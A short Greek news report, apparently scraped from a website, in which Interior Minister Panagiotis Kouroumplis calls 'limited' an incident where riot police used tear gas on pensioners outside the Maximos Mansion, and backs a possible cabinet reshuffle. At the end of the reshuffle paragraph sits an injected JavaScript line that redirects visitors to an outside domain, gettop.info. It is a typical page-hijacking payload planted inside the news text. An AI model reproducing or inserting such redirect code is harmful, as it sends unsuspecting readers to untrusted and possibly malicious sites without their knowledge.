Κουρουμπλής: Περιορισμένο το περιστατικό με τους συνταξιούχους

0
6

 

Η αστυνομία κάνει σωστά τη δουλειά της, τόνισε ο υπουργός Εσωτερικών Παναγιώτης Κουρουμπλής σε ραδιοφωνική του συνέντευξη στον «Παραπολιτικά 90.1», όπου σχολίασε την κίνηση των ανδρών ΜΑΤ να διασπάσουν τον κλοιό των συνταξιούχων με ρίψη δακρυγόνων και χημικών.

Ο υπουργός χαρακτήρισε «περιορισμένο» το περιστατικό μπροστά από το Μαξίμου και σημείωσε: «Η Αστυνομία πρέπει να κάνει σωστά τη δουλειά της και την κάνει πιστεύω. Tώρα αν υπήρξε αυτό το περιστατικό θα το δούμε. Πιστεύω ότι ήταν πάρα πολύ περιορισμένο».

Ανέφερε ότι τηλεφώνησε σε όλους τους αρμοδίους, στον γενικό γραμματέα του υπουργείου Δημόσιας Τάξης και τον αρχηγό της αστυνομίας λέγοντας ότι δεν πρέπει με κανένα τρόπο να δημιουργούνται τέτοιες καταστάσεις.

Σχολιάζοντας τα πολιτικά πράγματα εκφράστηκε θετικά υπέρ ενός ενδεχόμενου ανασηματισμού αλλά διαφώνησε με προοπτική εκλογών. «Ο ανασχηματισμός δημιουργεί έναν αέρα, ένα κλίμα, μια αισιοδοξία», είπε συγκεκριμένα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here